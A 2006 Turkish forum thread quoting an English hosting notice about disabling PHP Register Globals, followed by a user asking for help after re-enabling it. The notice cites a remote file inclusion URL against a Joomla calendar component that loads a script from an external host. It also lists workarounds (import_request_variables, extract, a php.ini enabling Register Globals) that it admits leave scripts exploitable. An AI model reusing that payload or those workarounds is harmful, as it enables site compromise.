|
|
| |||||||
| Makale & Çeviri yazılar Paylaşmak istediginiz makaleler yada çeviri yazılar. |
 |
| | LinkBack | Konu Seçenekleri |
26-09-2006, 05:22:23
| |||
| |||
 server configuration change Arkadaşlar şimdi bu yazıda özetle ne diyor php global disable edilmiş anladığım kadarı ile bunun dışında önemli birşey yazıyor mu ? We will be making a server configuration change related to PHP Register Globals at the date below. If you are NOT using PHP for your website you can disregard this notice. Currently PHP Register Globals is set to ON across our entire network of servers and will be changed to OFF. You will find a mini FAQ regarding this change below. Server: Jackson Change Date: Saturday September 30, 2006 Why are we making this change? When Register Globals is ON, you can overwrite variables in PHP scripts by appending them to the URL, e.g. script.php?myvar=42 would define a variable myvar with the value of 42. Depending on how your script works this could be a security risk which was the case with many of the scripts within Fantastcio being hacked/compromised. An example was Mambo/Joomla scripts being exploited by including the following in the requested URL: components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://*****.com/oki/lol.txt? The example above shows how easy it is to call an external script by using the calender component in Jooma to deface the website. PHP has set Register Globals default value to OFF since version 4.2.0 as noted here in the first line: http://us3.php.net/register_globals. What can happen as a result of this change? Old/outdated scripts still depending on Register Globals to be ON will have problems as those scripts need Register Globals to be on in order to work. What can be done to prevent/resolve any problems caused as a result of this change? Most scripts have dropped the need of Register Globals to be ON or have custom workarounds to this issue. Upgrading to the latest version of the script could possibly resolve any problems caused by this change. We also recommend contacting your script developer if you're unsure to see if Register Globals turned ON is a requirement. Other solutions include: 1- Contacting your script developer to make changes to the script so it does not rely on Register Globals to be enabled. 2- If your scripts need Register Globals enabled for the use of GET/POST/COOKIE variables then you can add the following in the fileheader: import_request_variables('GPC'); If you need other variables like SERVER use the function extract(). 3- If you need Register Globals ON then you can upload a custom php.ini file in your scripts directory to negate this change (this means your scripts will be vulnerable to being exploited). You can find a custom php.ini file at the URL below with Register Globals turned ON. Simply upload it to your scripts directory and name it php.ini to override the change on the server. http://www.hostingzoom.com/phpini.txt
__________________ Çok Güzel Scriptler Burada  |
|
12-10-2006, 13:14:18
| |||
| |||
| arkadaşlar biri şu yaızyı çevirebilir mi ? " joomla da modül ve companent yükleyemiyorum daha önce sorunsuz yüklüyordum. sanırım server da yapılan yeni değişiklikten dolayı olmuyor (register globals on) tarif ettiğiniz gibi phpini.text doyasını php.ini yapıp public_html içine attım ama yine problemim devam ediyor. modül ve companent yüklenmiyor."
__________________ Çok Güzel Scriptler Burada |
|
| Konuyu Toplam 1 üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
| Konu Seçenekleri | |
| |
